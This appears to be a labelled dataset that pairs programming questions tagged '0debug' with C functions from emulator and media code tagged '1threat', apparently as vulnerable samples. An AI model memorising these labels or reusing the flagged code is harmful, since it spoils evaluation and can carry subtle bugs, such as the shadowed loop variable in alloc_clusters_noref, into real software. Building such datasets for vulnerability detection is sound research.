Create (click) event on MatTab Material : <p>I dynamically loop thru tabs and i would like to add a (click) event on to be able to load different options when i select tab. </p> <p>Isn't it possible to have an event (click) event on ? I tried with (selectChange) on but then i cannot get hold of bank.id from my loop when creating tabs. </p> <p>Isn't it possible to add simple click event on dynamically created tabs??</p> <pre><code> &lt;mat-tab-group&gt; &lt;mat-tab label="All transactions"&gt; &lt;mat-list&gt; &lt;mat-list-item *ngFor="let bank of banks"&gt; &lt;h4 mat-line&gt;{{bank.fullName}}&lt;/h4&gt; &lt;/mat-list-item&gt; &lt;/mat-list&gt; &lt;/mat-tab&gt; &lt;mat-tab *ngFor="let bank of banks" (click)="fetchAccounts(bank.id)" label="{{bank.fullName}}"&gt; &lt;mat-list&gt; &lt;mat-list-item *ngFor="let account of accounts"&gt; &lt;h4 mat-line&gt;{{bank2.fullName}}&lt;/h4&gt; &lt;/mat-list-item&gt; &lt;/mat-list&gt; &lt;/mat-tab&gt; &lt;!-- &lt;mat-tab label="Test Bank" disabled&gt; No content &lt;/mat-tab&gt; --&gt; &lt;/mat-tab-group&gt; </code></pre>
0debug
Get by HTML element with React Testing Library? : <p>I'm using the <code>getByTestId</code> function in React Testing Library: </p> <pre><code>const button = wrapper.getByTestId("button"); expect(heading.textContent).toBe("something"); </code></pre> <p>Is it possible / advisable to search for HTML elements instead? So something like this:</p> <pre><code>const button = wrapper.getByHTML("button"); const heading = wrapper.getByHTML("h1"); </code></pre>
0debug
Weird behaviour with groupby on ordered categorical columns : <p>MCVE</p> <pre><code>df = pd.DataFrame({ 'Cat': ['SF', 'W', 'F', 'R64', 'SF', 'F'], 'ID': [1, 1, 1, 2, 2, 2] }) df.Cat = pd.Categorical( df.Cat, categories=['R64', 'SF', 'F', 'W'], ordered=True) </code></pre> <p></p> <p>As you can see, I've define an ordered categorical column on <code>Cat</code>. To verify, check;</p> <pre><code>0 SF 1 W 2 F 3 R64 4 SF 5 F Name: Cat, dtype: category Categories (4, object): [R64 &lt; SF &lt; F &lt; W] </code></pre> <p>I want to find the largest category PER ID. Doing <code>groupby</code> + <code>max</code> works.</p> <pre><code>df.groupby('ID').Cat.max() ID 1 W 2 F Name: Cat, dtype: object </code></pre> <p>But I don't want ID to be the index, so I specify <code>as_index=False</code>.</p> <pre><code>df.groupby('ID', as_index=False).Cat.max() ID Cat 0 1 W 1 2 SF </code></pre> <p>Oops! Now, the max is taken <strong>lexicographically</strong>. Can anyone explain whether this is intended behaviour? Or is this a bug?</p> <p>Note, for this problem, the workaround is <code>df.groupby('ID').Cat.max().reset_index()</code>.</p> <p>Note, </p> <pre><code>&gt;&gt;&gt; pd.__version__ '0.22.0' </code></pre>
0debug
Problem with dinamic URL rewrite with .htaccess : I had spend last few hours to get static URL from dynamic URL with .htaccess If I get wanted URL I also get 404 error. Dynamic URL is EN/section.php?lang=$1&url=$2 I had wrote ^(.*)/(.*)$ and it doesn't work. This work well with some prefix like ^language-(.*)/(.*)$ and then I get URL like domain/language-en/some-section and it works but it is not wanted URL RewriteRule ^(.*)/(.*)$ EN/section.php?lang=$1&url=$2 [L] I expect URL like domain/en/some-section not URL like domain/language-en/some-section.
0debug
How to convert SQL Query to Laravel Query Builder : select student_id ,count(case when attendance_status ='Absent' then 1 end) as absent_count ,count(case when attendance_status ='Present' then 1 end) as present_count ,count(case when attendance_status ='Leave' then 1 end) as leave_count ,count(distinct date) as Tot_count from tbl_student_attendance where month='September' group by student_id ;
0debug
static int local_utimensat(FsContext *s, V9fsPath *fs_path, const struct timespec *buf) { char *buffer; int ret; char *path = fs_path->data; buffer = rpath(s, path); ret = qemu_utimens(buffer, buf); g_free(buffer); return ret; }
1threat
static int64_t alloc_clusters_noref(BlockDriverState *bs, int64_t size) { BDRVQcowState *s = bs->opaque; int i, nb_clusters; nb_clusters = size_to_clusters(s, size); retry: for(i = 0; i < nb_clusters; i++) { int64_t i = s->free_cluster_index++; if (get_refcount(bs, i) != 0) goto retry; } #ifdef DEBUG_ALLOC2 printf("alloc_clusters: size=%" PRId64 " -> %" PRId64 "\n", size, (s->free_cluster_index - nb_clusters) << s->cluster_bits); #endif return (s->free_cluster_index - nb_clusters) << s->cluster_bits; }
1threat
export double value with comma : <p>i need to generate excel that display double values with a comma as grouping symbol. example :100000000.00 ------> 100,000,000.00 </p> <p>the comma symbol for group and the Dot symbol for decimal separator thanks,</p>
0debug
static int poll_filters(void) { AVFilterBufferRef *picref; AVFrame *filtered_frame = NULL; int i, frame_size; for (i = 0; i < nb_output_streams; i++) { OutputStream *ost = output_streams[i]; OutputFile *of = output_files[ost->file_index]; int ret = 0; if (!ost->filter) continue; if (!ost->filtered_frame && !(ost->filtered_frame = avcodec_alloc_frame())) { return AVERROR(ENOMEM); } else avcodec_get_frame_defaults(ost->filtered_frame); filtered_frame = ost->filtered_frame; while (ret >= 0 && !ost->is_past_recording_time) { if (ost->enc->type == AVMEDIA_TYPE_AUDIO && !(ost->enc->capabilities & CODEC_CAP_VARIABLE_FRAME_SIZE)) ret = av_buffersink_read_samples(ost->filter->filter, &picref, ost->st->codec->frame_size); else ret = av_buffersink_read(ost->filter->filter, &picref); if (ret < 0) break; avfilter_copy_buf_props(filtered_frame, picref); if (picref->pts != AV_NOPTS_VALUE) filtered_frame->pts = av_rescale_q(picref->pts, ost->filter->filter->inputs[0]->time_base, ost->st->codec->time_base) - av_rescale_q(of->start_time, AV_TIME_BASE_Q, ost->st->codec->time_base); if (of->start_time && filtered_frame->pts < of->start_time) { avfilter_unref_buffer(picref); continue; } switch (ost->filter->filter->inputs[0]->type) { case AVMEDIA_TYPE_VIDEO: if (!ost->frame_aspect_ratio) ost->st->codec->sample_aspect_ratio = picref->video->pixel_aspect; do_video_out(of->ctx, ost, filtered_frame, &frame_size, same_quant ? ost->last_quality : ost->st->codec->global_quality); if (vstats_filename && frame_size) do_video_stats(of->ctx, ost, frame_size); break; case AVMEDIA_TYPE_AUDIO: do_audio_out(of->ctx, ost, filtered_frame); break; default: av_assert0(0); } avfilter_unref_buffer(picref); } } return 0; }
1threat
Automatic centering of Google maps on points : <p>I have this code:</p> <pre><code>&lt;script src="https://maps.googleapis.com/maps/api/js?sensor=false"&gt;&lt;/script&gt; &lt;style&gt; #map_canvas { border:1px solid transparent; height: 400px; width: 100%; } &lt;/style&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-6 padding_all_right_4"&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 padding_all_3"&gt; &lt;h2 class="h2"&gt;Atrakcje w okolicy&lt;/h2&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-6 col-md-6 col-lg-6 padding_all_2"&gt; &lt;a href ="#" class="obj-1" id="obj-1"&gt; &lt;div class="apartament_atrakcje"&gt;Atrakcja 1 pl&lt;/div&gt; &lt;/a&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-6 col-md-6 col-lg-6 padding_all_2"&gt; &lt;a href ="#" class="obj-2" id="obj-2"&gt; &lt;div class="apartament_atrakcje"&gt;Atrakcja 2 PL&lt;/div&gt; &lt;/a&gt; &lt;/div&gt; &lt;div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 padding_all_0"&gt; &lt;div class="apartament_mapa"&gt; &lt;div id="map_canvas"&gt;&lt;/div&gt; &lt;script&gt; var locations = [ ['Atrakcja 1 pl', 51.73925413, 19.51309225, 1], ['Atrakcja 2 PL', 53.41475000, 14.60220358, 2], ]; var map; var markers = []; function init(){ map = new google.maps.Map(document.getElementById('map_canvas'), { zoom: 10, center: new google.maps.LatLng(-33.92, 151.25), mapTypeId: google.maps.MapTypeId.ROADMAP }); var num_markers = locations.length; for (var i = 0; i &lt; num_markers; i++) { markers[i] = new google.maps.Marker({ position: {lat:locations[i][1], lng:locations[i][2]}, map: map, html: locations[i][0], id: i, }); google.maps.event.addListener(markers[i], 'click', function(){ var infowindow = new google.maps.InfoWindow({ id: this.id, content:this.html, position:this.getPosition() }); google.maps.event.addListenerOnce(infowindow, 'closeclick', function(){ markers[this.id].setVisible(true); }); this.setVisible(false); infowindow.open(map); }); } } init(); &lt;/script&gt; </code></pre> <p>The script displays 2 points on the google map. I have a problem with centering the map on these points. Currently, I enter the coordinates of the centering of the map in the page code, however points on the map are added from the CMS and must center automatically :(</p> <p>Does anyone know how to do it?</p>
0debug
void cpu_outb(pio_addr_t addr, uint8_t val) { LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); trace_cpu_out(addr, val); ioport_write(0, addr, val); }
1threat